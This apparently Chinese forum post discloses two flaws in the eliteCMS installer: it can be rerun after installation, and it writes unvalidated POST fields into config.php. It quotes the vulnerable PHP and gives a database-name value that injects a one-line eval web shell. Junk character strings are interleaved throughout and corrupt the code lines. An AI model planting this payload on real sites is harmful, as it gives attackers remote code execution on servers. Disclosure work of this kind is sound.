eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
, d3 s( s1 d6 g8 G* g9 k: p
% i, [. a+ e4 O2 i+ C+ S另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
) A0 Q x y: `) G2 P! e2 L我们来看代码:
+ a$ g) U4 |1 [% \- Q 1 G9 q* `# S/ A! G; p7 A$ ]
...4 \3 b: Y. [: c, j5 o8 S- z
elseif ($_GET['step'] == "4") {
' c5 i1 R+ X# y2 C* u $file = "../admin/includes/config.php";2 `6 S3 u$ m5 Q+ ?) L; _# _. U
$write = "<?php\n";+ z: l( A/ T1 k1 t! e# k, p
$write .= "/**\n";
5 L5 x9 U0 j" V& U& k $write .= "*\n";( e4 Z; W$ o' o; _' D1 T
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
3 O4 V7 M- \% r' W. k& L4 @' Z9 i$ V2 M...略...
, b$ L) Z2 @7 A7 H8 u5 B6 A6 P $write .= "*\n";
! C6 F+ r8 e6 w- ^8 S! R, x( \ $write .= "*/\n";
8 }4 |) f1 a& B1 W% }! B, { $write .= "\n";
" y& k$ {, ?8 j# `& D. D( _ $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
3 I4 \3 z7 P; z/ y! {9 f $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n"; |! y1 J% Q* d9 J
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";+ u; |% o& i# D# h3 g
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
3 S/ \. \( ?9 l! Z# N) i! w6 @& e $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
! {8 B0 K: ^6 a! q) S! u5 b3 E $write .= "if (!\$connection) {\n";
; D# ]* h' o2 w X- ?% e9 R5 S $write .= " die(\"Database connection failed\" .mysql_error());\n";
d: L( X7 q3 m3 j3 ~# ] $write .= " \n";+ ~) k. s: i7 o( t) M
$write .= "} \n";
d7 K9 a8 x. U8 H3 y* n# s b2 K3 C $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
! ]& o5 p, b1 V' `! X+ A $write .= "if (!\$db_select) {\n";
9 ^% S& ^# w: n; b4 [' d$ t5 z $write .= " die(\"Database select failed\" .mysql_error());\n";
8 x9 e2 {6 l* W' F3 y! o $write .= " \n";$ K, S/ O ^4 C" o: K' [: Z+ ]3 x
$write .= "} \n";* ^7 k% P: C% E
$write .= "?>\n";
7 N7 m6 ?/ g" } 0 t7 F, x3 Y" `+ ? O
$writer = fopen($file, 'w');+ l4 e5 ]9 c$ W* o
...
. L9 h+ U8 h0 f' [( z4 ~& m0 [ , H, p) U7 U N3 {, }1 D
在看代码:
; Z, [# V9 l* ~) p + q2 t% W9 `8 @# X4 S! i
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
1 ^2 Z7 H; S& z0 R: P$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
3 H: l+ l5 i4 d3 Y" _$_SESSION['DB_USER'] = $_POST['DB_USER'];3 Q1 I- f2 W# F- l8 t- [8 q' u2 F
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
; k l5 w0 b/ n9 ^2 @
: T6 J5 a& N0 V8 W' x取值未作任何验证3 j# ~$ l+ P7 \! d' F
如果将数据库名POST数据:: f; `3 M4 j; v
7 b! W+ T. W; N& s
"?><?php eval($_POST[c]);?><?php2 }& l! c+ a3 g7 J3 L
+ X/ K3 A& t# a, B将导致一句话后门写入/admin/includes/config.php
1 z: l! R" o. K7 c: \& e |
发表于 2012-11-18 13:59:27
收藏
支持
反对